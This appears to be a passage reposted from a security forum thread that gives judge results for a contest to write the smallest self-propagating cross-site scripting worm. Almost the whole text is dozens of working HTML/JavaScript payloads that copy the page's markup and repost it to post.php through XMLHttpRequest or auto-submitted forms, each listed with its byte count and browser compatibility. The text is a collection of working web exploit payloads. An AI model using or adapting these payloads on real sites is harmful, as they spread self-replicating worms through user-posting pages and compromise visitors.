출 처 : http://sla.ckers.org/forum/read.php?2,18790,page=19
<form><input
name="content"><img src=""
onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">
and
<form><INPUT name="content"><IMG src=""
onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">
Both were a stunningly small 161 bytes! Congrats to both of the
guys and a huge round of applause to everyone who submitted results. I
was completely shocked by the results, as I thought we'd land at a much
smaller number, but I think that was muddied by the fact that many
people couldn't test their code in IE7.0.
And for those who want to see how the rest of the results panned
out here are the judge results (feel free to contest them - it was a
ton of work going through them so I _may_ have made errors):
spyware - 136 Doesn't work in Firefox 2.0.0.11
ý<form onFocus="submit(alert('xss'))"><input
onFocus="id=content,value=document.body.match(/ý.ó/)"><iframe
onLoad="parentNode.focus()">ó
gareth - 162 Doesn't work in Firefox 2.0.0.11
<iframe onload="c=['content=','<iframe
onload=\42',attributes[0].nodeValue,'\42>'].join('');with(new
XMLHttpRequest)open('POST','post.php'),send(c);alert('XSS')">
digi7al64 (via gareth) - 144 Doesn't work in Firefox 2.0.0.11
,<b><img src=""onerror="alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),send(['content=',parentNode.innerHTML.bold()].join())"></b>
doctordan - 154 Doesn't work in Firefox 2.0.0.11
„<iframe onload="with(new
XMLHttpRequest)open('POST','post.php'),send(''.concat('content=',parentNode.innerHTML.match(/„.+\v/))),alert('XSS')">0x0B
sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src=""
onerror="with(i=parentNode)action=(method='post')+'.php',submit(i[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">
ma1 - 165 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src=""
onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">
.mario -154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe
onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
Ronald - 147 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe
onload="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">
sdc - 149 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><img src=""
onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">
Gareth - 148 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe
onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">;
Ronald - 198 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
Ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src=''
onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">
sdc - 142 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new
XMLHttpRequest)open('POST','post.php'),send('<content>'+parentNode.innerHTML.bold(alert('xss')+'</content>')"></b>
ma1 - 201 Doesn't work in Firefox 2.0.0.11 on second iteration)
<b><iframe onload="with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),198))"
gareth - 209 Works in FF with no growth but doesn't work in IE7.0
<img src=""
onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">
Ronald - 203 Works on FF and IE!!! (does change order around, but no growth):
<b><img src="" onerror="with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
Turns into (also 203 chars):
<B><IMG onerror="with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"
src=""></B>
ma1 - 132 Doesn't work in Firefox 2.0.0.11 as written
<b><iframe onload="with(new
XMLHttpRequest)open('POST','post.php'),send('content=<b>'+parentNode.innerHTML.slice(alert('XSS'),129))"
ma1 - 140 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="with(new
XMLHttpRequest)open('POST','post.php'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),137)))"
ma1 - 209 Works in FF with no growth but doesn't work in IE7.0
<b><iframe onload="with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content=<b>'.concat(parentNode.innerHTML.slice(alert('XSS'),206)))"
gareth - 188 Works in FF with no growth but doesn't work in IE7.0
<img src=""
onerror="appendChild(cloneNode(0));i=innerHTML;with(appendChild(createElement('form')))submit(alert('XSS'),innerHTML='<textarea
name=content>'+i,action=(method='post')+'.php')">
gareth - 209 Doesn't work in Firefox 2.0.0.11
<img src=""
onerror="alert('XSS');appendChild(cloneNode(0));i=innerHTML;with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-type','application/x-www-form-urlencoded'),send('content='+i)">
matt presson (via gareth) - 140 Doesn't work in Firefox 2.0.0.11
<img src=""
onerror="alert('xss');appendChild(cloneNode(0));i=innerHTML;with(new
XMLHttpRequest)open('POST','post.php'),send('content='+i)">
gareth - 128 Missing payload
<img src=""
onerror="appendChild(cloneNode(0));i=innerHTML,h=new
XMLHttpRequest;h.open('POST','post.php');h.send('content='+i)">
digi7al64 - 140 Doesn't work in Firefox 2.0.0.11
<p><iframe onload="alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>
glacialphoenix (via digi7al64) - 226 Doesn't work in Firefox 2.0.0.11
<p/id=_><script>alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>
doctordan - 133 Invalid as parens may exist elsewhere on the page
{<iframe onload="with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B
digi7al64 - 133 Doesn't work in Firefox 2.0.0.11
<p id=_><script>alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),send('content=<p
id=_>'+_.innerHTML+'</p>')</script></p>
digi7al64 - 134 IE only
<form id=_ method=post action=post.php><input
name='content'><iframe
onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>
digi7al64 - 111 IE only
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>
badsamaritan - 168 Works in FF but grows
<form method=post action=post.php><input
name=content><input type=image
onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>
gareth - 146 Works in FF but grows
<form><input name="content"><iframe
onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"
gareth - 153 Works in FF with no growth but doesn't work in IE7.0
<form><img src=""
onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input
name="content">
ronald - 152 Works in FF with no growth but doesn't work in IE7.0
<form><input name='content'><img src=''
onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">
gareth - 204 Works in FF with no growth but doesn't work in IE7.0
_<script>c=(d=document).body.innerHTML.match(/_<.*/)+'\n';with(d.body.appendChild(d.createElement('form')))submit(alert('XSS',innerHTML='<textarea
name=content>'+c,action=(method='post')+'.php'))</script>
ronald - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
gareth - 160 Works in FF with no growth but doesn't work in IE7.0
<form><input
onerror="i=this;with(form)submit(alert('XSS',i.value='<form>'+innerHTML,i.type=action=(method='post')+'.php'))"
name="content" src="" type="image">
doctordan - 139 Invalid as parens may exist elsewhere on the page
{<img src='' onerror="with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+?\d/)),alert('XSS')">9
doctordan (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/_<.+/))">
gareth - 142 Doesn't work in Firefox 2.0.0.11
_<img src="" onerror="alert('XSS');with(new
XMLHttpRequest)open('POST','post.php'),send('content='+document.body.innerHTML.match(/_<*.+/))">
doctordan (via ronald) - 130 Doesn't work in Firefox 2.0.0.11
<b><img onerror="with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"src=></b
doctordan (via ronald) - 134 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
matt presson (via backstorm/ronald) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('xss')))"></b>
backstorm - 125 Doesn't work in Firefox 2.0.0.11
<b><i onload="alert('xss')with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"/></b>
matt presson (via backstorm) - 125 Doesn't work in Firefox 2.0.0.11
<b><a onblur="alert('xss')with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>
ronald - 131 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="with(new
XMLHttpRequest)open('POST','post.php'),send(content=parentNode.innerHTML.bold(alert('XSS')))"></b>
sdc - 154 (via ma1/.mario) Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe
onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
.mario (via ma1) - 154 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe
onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',148)))"
ma1 - 155 Works in FF with no growth but doesn't work in IE7.0
<form><input name="content"><iframe
onload="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',149)))">
.mario - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe/onload="with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"></b>
.mario - 134 Doesn't work in Firefox 2.0.0.11
<b><img/onerror="with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold(alert('XSS')))"/src=""></b>
ronald - 130 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>
ronald - 135 Doesn't work in Firefox 2.0.0.11
<b><img src='' onerror="alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>
ronald (via gareth) - 138 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></iframe></b>
bwb labs - 251 - Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new
XMLHttpRequest)open('POST','post.php'),setRequestHeader('content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
bwb labs - 254 Grows
<img src=. alt="alert('XSS');with(new
XMLHttpRequest)open('post','post.php'),setRequestHeader('Content-Type','application/x-www-form-urlencoded'),send('content='+encodeURIComponent('<img
src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))"
onerror=eval(alt)>
matt presson - 128 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold)"></b>
gareth - 156 Doesn't work in Firefox 2.0.0.11
<x><script>alert('XSS');with(new
XMLHttpRequest)open(x='post',x+'.php'),send('content='+document.body.parentNode.innerHTML.match(/<x>.*<\/x>/))</script></x>
ronald - 129 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');with(new
XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>
spyware - 173 Doesn't work in Firefox 2.0.0.11
<form id=a></HEAD><BODY><INPUT id=x
name=content><IFRAME
onload="a.action=(a.method='post')+'.php',x.value='<form
id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>
spyware - 157 Doesn't work in Firefox 2.0.0.11
<form id=a><input id="x" name="content"><iframe
onload="a.action=(a.method='post')+'.php',x.value='<form
id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>
spyware - 146 Doesn't work in Firefox 2.0.0.11
<form id=a><input id=x name="content"><iframe
onload="a.action=(a.method='post')+'.php',x.value='<form
id=a>'+a.innerHTML;a.submit(alert('xss'))">
gareth - 206 Doesn't work in Firefox 2.0.0.11
<script
x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script
x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php
method=post><textarea
name=content>'+c,forms[0].submit()</script>
ronald - 136 Breaks DOM knowledge rule
<form><iframe onload="alert('xss');r=new
XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">
beni (via ronald) - 131 Doesn't work in Firefox 2.0.0.11
<b><iframe onload="alert('xss');r=new
XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>
ronald - 111 Doesn't work in Firefox 2.0.0.11 and grows
<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">
ronald - 174 Grows
<iframe src=. onload="alert('xss');r=new
XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">
gareth - 192 Uses the onload event handler which may already be assigned
<body
onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea
name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"
mario (via beni) - 177 Works in FF but breaks in IE7.0 on second iteration
<b><form action="post.php" method="post"><input
name="content"><img src="1"
onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>
beni - 171 Works in FF but breaks in IE7.0 on second iteration
<b><form action=post.php method=post><input
name=content><img src=1
onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>
gareth - 175 Doesn't work in Firefox 2.0.0.11
<script>with(d=document)(b=body).innerHTML='<form><textarea
name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>
gareth - 153 Breaks DOM knowledge rule
<script>with(document.body)innerHTML='<form
action=post.php method=post><textarea
name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>
gareth - 147 Breaks DOM knowledge rule
<body onload="with(document)body.innerHTML='<form
action=post.php method=post><textarea
name=content>'+body.parentNode.innerHTML,forms[0].submit()"
gareth - 175 Breaks DOM knowledge rule
<script>with(d=document)(b=body).innerHTML='<form><textarea
name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>
ronald - 185 Breaks DOM knowledge rule
<form name="i" id=j>
<input
name='content'><script>(j)?x=j:x=document.i;x[0].value='<form
name="i"
id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
.mario (via ronald) - 161 Breaks DOM knowledge rule
<form name=_><input
name="content"><script>x=document._;x[0].value='<form
name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
ronald (doctype check) - 165 Breaks DOM knowledge rule
<form id=_><input
name='content'><script>(_)?x=_:x=document.i;x[0].value='<form
id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
ronald (via kyran) - 185 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new
XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>
bwb labs - 253 Doesn't work in Firefox 2.0.0.11
<script>eval(y="alert('XSS');q=unescape('%22');with(new
XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
bwb labs - 256 Doesn't work in Firefox 2.0.0.11
<img src=. alt="alert('XSS');with(new
XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img
src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}"
onerror=eval(alt)>
bwb labs - 255 Works in both FF and IE7.0!!!
<script>eval(y="alert('XSS');q=unescape('%22');with(new
XMLHttpRequest()){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
spikeman - 154 Grows
<form><input id="c" name="content"><img
onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))"
src="
bwb labs (via dbloom) - 256 Works in FF and IE!!!
<script>eval(y="alert('XSS');q=unescape('%'+22);with(new
XMLHttpRequest()){open('POST','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
.mario - 158 Doesn't work in Firefox 2.0.0.11
<form name=m><input
name="content"><script>with(document.m)submit(alert('XSS'),action=(method='post')+'.php',content.value='<form
name=f>'+innerHTML)</script>
.mario - 159 Works in FF with no growth but doesn't work in IE7.0
<form><img
onerror="with(i=parentNode)alert('XSS',submit(i[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',153)))"
src="x"><input name="content"
kyran - 183 Doesn't work in Firefox 2.0.0.11
<script>alert('xss');with(new
XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};</script>
sdc - 154 - Grows in FF
<form><input name=content><img
onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=
sdc - 154 - Grows in FF (same as above)
<form><input name=content><img
onerror="with(_=parentNode)alert('XSS',submit(_[0].value='<form>'+innerHTML.slice(action=(method='post')+'.php',151)))"src=
ma1 (via gareth) - Works in FF but grows and stops working in IE7.0
<form><input name="content"
onmousemove="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),128))">
gareth - 154 Posts to the wrong page
<form><input name=content onMouseMove="eval(value)"
value="alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()">
gareth - 160 Posts to the wrong page
<form><textarea name=content
onMouseMove="eval(value)">alert('XSS');with(parentNode)action=(method='post')+'9.php',value='<form>'+innerHTML,submit()</textarea>
dbloom - 252 Posts to the wrong page (resides in the same directory)
<body
onfocus=with(document)[c=["%3"]+"E",body.innerHTML=unescape("<form\tmethod=post\taction=/post.php"+c+"<textarea\tname=content"+c+"<body\tonfocus="+(onfocus+c).replace(/[\s\x7B\x7D\x3B]|^[^\)]*\)/g,"")+"</body"+c),forms[0].submit(),alert("xss")]>
ma1 - 157 Breaks DOM knowledge rule
<form name=f><input
name="content"><script>with(_=document.f)submit(_[0].value='<form
name=f>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>
doctordan - 158 Doesn't work in Firefox 2.0.0.11
<form name=r><input
name="content"><script>with(document.r)submit(content.value='<form
name=r>'+innerHTML,action=(method='post')+'.php',alert('XSS'))</script>
spyware - 141 Doesn't work in Firefox 2.0.0.11 if body content is present - so close!
ý<form action="post.php" method="post"><input
name="content"
onclick="alert('xss');value=body.innerHTML.slice(/ý.ú/);"
type="submit">ú</form>
ma1 - 142 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name="content"><script>with(_)_[0].value='<form
id=_>'+innerHTML,action=(method='post')+'.php',submit(alert('XSS'))</script>
ronald - 143 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name='content'><script>_[0].value='<form
id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>
sdc (via ronald) 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name="content"><script>_[0].value='<form
id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>undefined
sdc (via gareth) 169 Doesn't work in Firefox 2.0.0.11
<form><input type="image" name="content"
onerror="alert('XSS');with(p=parentNode)action=(method='post')+'.php',value='<form>'+p.innerHTML;type='text';p.submit()"
src="">
gareth - 164 Posts to the wrong page
<form><input type=image name=content
onerror="alert('XSS');with(p=parentNode)action=(method='post')+'8.php',value='<form>'+p.innerHTML;type='text';p.submit()"
src>
sdc - 160 Works in FF with no growth but doesn't work in IE7.0
<form><INPUT name="content"><IMG src=""
onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">
.mario - 132 Doesn't work in Firefox 2.0.0.11
<form><input id="i"
name="content"><script>with(i.form)submit(alert('XSS'),action=method='post',i.value='<form>'+innerHTML)</script>
.mario - 141 Doesn't work in Firefox 2.0.0.11
<form><input id="i"
name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>
ronald - 132 Doesn't work in Firefox 2.0.0.11
<form action="post.php" method="post"><input
name="content"
onclick="alert('xss');value=body.innerHTML.slice(/./);submit();"></form>
spyware - 129 Doesn't work in Firefox 2.0.0.11
ý<FORM action=post.php method=post><INPUT
onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"
name=content></FORM>
spyware - 135 Doesn't work in Firefox 2.0.0.11
ý<form action="post.php" method="post"><input
name="content"
onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"></form>
mario (via ronald) - 142 Doesn't work in Firefox 2.0.0.11
<form id=m><input
name="content"><script>with(m)m[0].value='<form
id=m>'+innerHTML,submit(action=(method='post')+'.php'),alert('XSS')</script>
ronald - 141 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name="content"><script>_[0].value='<form
id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>
ronald - 145 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name="content"><script>_[0].value='<form
id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>
ronald - 147 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name=content><script>_.content.value='<form
id=_>'+_.innerHTML+alert('XSS');_.action=(_.method='post')+'.php';_.submit();</script>
spikeman (via .mario) - 132 Requires user interaction
<form id=i><button
onclick="i.action=(i.method='post')+'.php';value='<form
id=i>'+i.innerHTML;alert('XSS')" name="content"></button>
.mario - 140 Requires user interaction
<form id=j><button
onclick="j.action=j.method='post';value='<form
id=j>'+j.innerHTML+'</form>';alert('XSS')"
name="content"></button></form>
.mario - 136 Requires user interaction
<form><button
onclick="with(parentNode)action=(method='post')+'.php',value='<form>'+innerHTML.slice(alert('XSS'),129)"
name="content">
.mario - 125 Requires user interaction
<form id=i><button
onclick="i.method=i.action='post',value='<form
id=i>'+i.innerHTML;alert('XSS')" name="content"></button>
.mario (via all) - 125 Requires user interaction
<form><input name="content"
onblur="submit(action=method='post',value='<form>'+form.innerHTML.slice(alert('xss'),119))">
.mario - 126 Requires user interaction
<form><input name="content"
onblur="submit(action=method='post',value='<form>'+parentNode.innerHTML.slice(alert('xss'),128))">
.mario - 171 Works in FF with no growth and works in IE and actually shrinks!!!
<b><img
onerror="alert('xss');with(i)content.value=parentNode.innerHTML.bold(),submit()"
src="m"><form id="i" action="post" method="post"><input
name="content"></form></b>
bwb labs - 271 Works in both FF with no growth and IE!!!
<img src='' alt="alert('XSS');var x=new
XMLHttpRequest;x.open('post','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<img
src=\'\' alt=\x22'+alt+'\x22 onerror=\'eval(alt)\'>'))"
onerror='eval(alt)'>
barbarianbob (via ma1) - 127 Requires user interaction
<form<input name="content"
onblur="submit(action=(method='post')+'.php',value='<form'+form.innerHTML.slice(alert('xss'),122))">
spyware - 140 Requires user interaction
ý<form action="post.php" method="post"><input
name="content"
onclick="alert('xss');value=body.innerHTML.match(/ý.*/);"
type="submit"></form>
hallvors - 150 Doesn't work in Firefox 2.0.0.11
<iframe src="javascript:alert('XSS');with(new
top.XMLHttpRequest){open('post','post.php');send('content=<iframe
src=\x22'+frameElement.src+'\x22>')}">
hallvors - 185 Doesn't work in Firefox 2.0.0.11
<iframe
src="javascript:alert('XSS');onload=function(){f[0].value='<iframe
src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post
action=post.php id=f><input name=content>'">
shawn (via ma1) - 128 Requires user interaction
<form><input name="content"
onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">
bwb labs - 266 Works in FF with no growth and IE!!!
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new
XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>
spyware - 134 Requires user interaction
ý<form method="post" action="post.php"><input
name="content"
onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>
ma1 - 129 Requires user interaction
<form><input name="content"
onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">
ma1 - 136 Requires user interaction
<form><input name="content"
onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">
spyware - 134 Requires user interaction
<form method="post" action="post.php"><input
name="content"
onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>
sdc (via shawn) - 143 Doesn't work in Firefox 2.0.0.11
<form><INPUT name="content"><IMG src=""
onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">
shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form
id=_>'+innerHTML.slice(alert('XSS'),146))</script>
spyware - 151 Requires user interaction
<form method="post" action="post.php"><input
name="content"
onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>
sdc - 150 Requires user interaction
<b><form method="post" action="post.php"><input
name="content"
onfocus="submit(value=parentNode.parentNode.innerHTML.bold(),alert('xss'))"></form></b>
spyware - 137 Requires user interaction
<form method="post" action="post.php"><input
name="content"
onfocus="content.value=document.body.innerHTML;alert('xss');submit()"></form>
sdc - 164 Doesn't work in Firefox 2.0.0.11
<script>function f(){alert("XSS");(x=new
XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>"+f+"f()</"+"script>"));}f()</script>
sdc - 141 Doesn't work in Firefox 2.0.0.11
<script>function w(){alert("xss");(n=new
XMLHttpRequest).open("post","post.php");n.send("content=<script>("+w+"())</"+"script>")}w()</script>
spyware - 122 Requires user interaction
<form method=POST action=post.php><INPUT NAME=content
onFocus=content.value=document.body.innerHTML;alert('xss');submit()>
shawn - 153 Doesn't work in Firefox 2.0.0.11
<form id=_><input name=content
id=c><script>with(_)submit(action=(method='post')+'.php',c.value='<form
id=_>'+innerHTML.slice(alert('XSS'),146))</script>
amado - 140 Doesn't work in Firefox 2.0.0.11
<script>(function w(){alert("xss");n=new
XMLHttpRequest;n.open("post","post.php");n.send("content=<script>("+w+"())<\/script>")}())</script>
sdc - 155 Doesn't work in Firefox 2.0.0.11
<form><input
name="content"><script>with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),146))</script>
ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form
id=_>'+innerHTML.slice(alert('XSS'),147))</script>
ma1 - 156 Doesn't work in Firefox 2.0.0.11
<form id=_><input
name="content"><script>with(_)alert('XSS',submit(content.value='<form
id=_>'+innerHTML.slice(action=(method='post')+'.php',147)))</script>
ma1 - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><input name="content"><img src=""
onerror="with(parentNode)alert('XSS',submit(content.value='<form>'+innerHTML.slice(action=(method='post')+'.php',155)))">
dev80 - 159 Doesn't work in Firefox 2.0.0.11
<script>function p() {alert("xss");x=new
XMLHttpRequest;x.open("post","post.php");x.send("content=<script>"
+ p.valueOf() + "p()<\/script>");}p()</script>
sdc - 161 Works in FF with no growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src=""
onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">
ma1 - 164 (works with opera and safari also) Works in FF with no
growth then shrinks and then regrows to the same size in IE7.0!!!
<form><INPUT name="content"><IMG src="/"
